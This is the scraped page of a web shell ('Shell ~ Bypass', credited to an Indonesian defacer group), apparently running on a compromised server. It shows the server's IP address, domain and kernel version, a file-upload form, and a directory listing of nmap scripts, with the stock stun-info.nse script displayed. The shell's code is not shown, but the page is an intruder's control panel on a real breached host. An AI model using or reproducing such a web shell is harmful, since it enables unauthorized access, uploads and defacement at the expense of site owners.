Shell ~ Bypass
[+] Kelelawar Cyber Team [+]
:
216.73.216.123
:
104.131.203.165 / webuikits.com
:
Linux Webuikits 3.13.0-57-generic #95-Ubuntu SMP Fri Jun 19 09:28:15 UTC 2015 x86_64
:
/
usr
/
share
/
nmap
/
scripts
/
Upload File:
files >> //usr/share/nmap/scripts/stun-info.nse
local nmap = require "nmap" local shortport = require "shortport" local stun = require "stun" description = [[ Retrieves the external IP address of a NAT:ed host using the STUN protocol. ]] --- -- @usage -- nmap -sV -PN -sU -p 3478 --script stun-info <ip> -- -- @output -- PORT STATE SERVICE -- 3478/udp open|filtered stun -- | stun-info: -- |_ External IP: 80.216.42.106 -- author = "Patrik Karlsson" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"discovery", "safe"} portrule = shortport.port_or_service(3478, "stun", "udp") local function fail(err) return ("\n ERROR: %s"):format(err or "") end action = function(host, port) local helper = stun.Helper:new(host, port) local status = helper:connect() if ( not(status) ) then return fail("Failed to connect to server") end local status, result = helper:getExternalAddress() if ( not(status) ) then return fail("Failed to retrieve external IP") end port.version.name = "stun" nmap.set_port_state(host, port, "open") nmap.set_port_version(host, port) if ( result ) then return "\n External IP: " .. result end end
Copyright ©2021 || Defacer Indonesia